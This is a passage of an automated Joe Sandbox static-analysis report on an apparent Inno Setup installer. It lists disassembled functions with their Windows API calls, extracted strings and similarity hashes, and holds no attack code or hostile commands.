                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                              • String ID: SeShutdownPrivilege
                                                              • API String ID: 107509674-3733053543
                                                              • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                              • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                              • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                              • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                              Function 0045D188 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                              • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                              • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                              • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CryptVersion
                                                              • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                              • API String ID: 1951258720-508647305
                                                              • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                              • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                              • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                              • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                              Function 004980A4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                              • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                              • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirstNext
                                                              • String ID: isRS-$isRS-???.tmp
                                                              • API String ID: 134685335-3422211394
                                                              • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                              • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                              • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                              • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                              Function 00457594 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241windownativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                              • SetForegroundWindow.USER32(?), ref: 00457649
                                                              • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                              Strings
                                                              • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                              • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                              • API String ID: 2236967946-3182603685
                                                              • Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                              • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                              • Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                              • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                              Function 00455E0C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                              • API String ID: 1646373207-3712701948
                                                              • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                              • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                              • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                              • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                              Function 00417CD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 00417D0F
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                              • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$Placement$Iconic
                                                              • String ID: ,
                                                              • API String ID: 568898626-3772416878
                                                              • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                              • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                              • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                              • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                              Function 00464158 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                              • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseErrorFirstModeNext
                                                              • String ID:
                                                              • API String ID: 4011626565-0
                                                              • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                              • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                              • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                              • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                              Function 00463CDC Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                              • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseErrorFirstModeNext
                                                              • String ID:
                                                              • API String ID: 4011626565-0
                                                              • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                              • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                              • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                              • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                              Function 0042E934 Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                              • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                              • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                              • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                              • String ID:
                                                              • API String ID: 1177325624-0
                                                              • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                              • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                              • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                              • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                              Function 0048393C Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 0048397A
                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                              • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                              • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$IconicLong
                                                              • String ID:
                                                              • API String ID: 2754861897-0
                                                              • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                              • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                              • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                              • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                              Function 00462750 Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                              • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 3541575487-0
                                                              • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                              • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                              • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                              • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                              Function 004241DC Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 004241E4
                                                              • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021E25AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                              • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveFocusIconicShow
                                                              • String ID:
                                                              • API String ID: 649377781-0
                                                              • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                              • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                              • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                              • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                              Function 00417CCE Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 00417D0F
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                              • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$Placement$Iconic
                                                              • String ID:
                                                              • API String ID: 568898626-0
                                                              • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                              • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                              • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                              • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                              Function 00417598 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CaptureIconic
                                                              • String ID:
                                                              • API String ID: 2277910766-0
                                                              • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                              • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                              • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                              • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                              Function 00424194 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 0042419B
                                                                • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                              • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveEnumIconicLongShowWindows
                                                              • String ID:
                                                              • API String ID: 2671590913-0
                                                              • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                              • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                              • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                              • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                              Function 004125D8 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
